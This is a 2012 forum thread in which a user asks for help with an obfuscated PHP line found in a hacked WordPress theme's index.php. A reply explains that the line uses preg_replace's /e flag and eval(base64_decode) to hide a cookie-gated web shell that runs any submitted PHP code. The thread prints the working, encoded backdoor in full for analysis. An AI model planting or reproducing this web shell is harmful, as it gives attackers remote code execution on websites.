Page 1 of 1

Strange PHP code in Wordpress theme

Posted: Wed Nov 21, 2012 1:46 pm
by mecha_godzilla
Hi,

A friend of mine's WordPress site got hacked recently and I'm going through all the files to try and work out what happened. I won't mention the theme in question here but there are four suspect files - three of them are JavaScripts that have had document.write() appended to them to load in 3rd party sites into an iframe in the main template but the fourth file (index.php) has the following code right at the top:

Code: Select all

preg_replace("/.+/esi","\x65\x76\x61\x6C\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'aWYgKCFlbXB0eSgkX0NPT0tJRVsndiddKSBhbmQgJF9DT09LSUVbJ3YnXT09J2QnKXtpZiAoIWVtcHR5KCRfUE9TVFsnYyddKSkge2VjaG8gJzx0ZXh0YXJlYSByb3dzPTI4IGNvbHM9ODA+JzsgJGQ9YmFzZTY0X2RlY29kZShzdHJfcmVwbGFjZSgnICcsJysnLCRfUE9TVFsnYyddKSk7aWYoJGQpIGV2YWwoJGQpOyBlY2hvICc8L3RleHRhcmVhPic7fQ0KZWNobyAnPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD1wb3N0Pjx0ZXh0YXJlYSBjb2xzPTgwIHJvd3M9MjggbmFtZT1jPjwvdGV4dGFyZWE+PGJyPjxpbnB1dCB0eXBlPXN1Ym1pdD48L2Zvcm0+JztleGl0O30='\x29\x29\x3B",'1');
Anyone have any idea how to "decode" this, or work out what it's doing?

Thanks in advance,

Mecha Godzilla

Re: Strange PHP code in Wordpress theme

Posted: Wed Nov 21, 2012 2:30 pm
by requinix
The /e flag tells preg_replace() to evaluate the replacement string as PHP code. That's the first warning that it's malicious.

There's only two layers of obfuscation, the second being a common eval(base64_decode(...)). The result is something which allows someone with $_COOKIE["v"] == "d" to see a form which allows them to submit and evaluate PHP code.

Re: Strange PHP code in Wordpress theme

Posted: Wed Nov 21, 2012 2:41 pm
by mecha_godzilla
Ok, that sounds about as ominous as I was expecting :mrgreen:

Thanks for your help,

M_G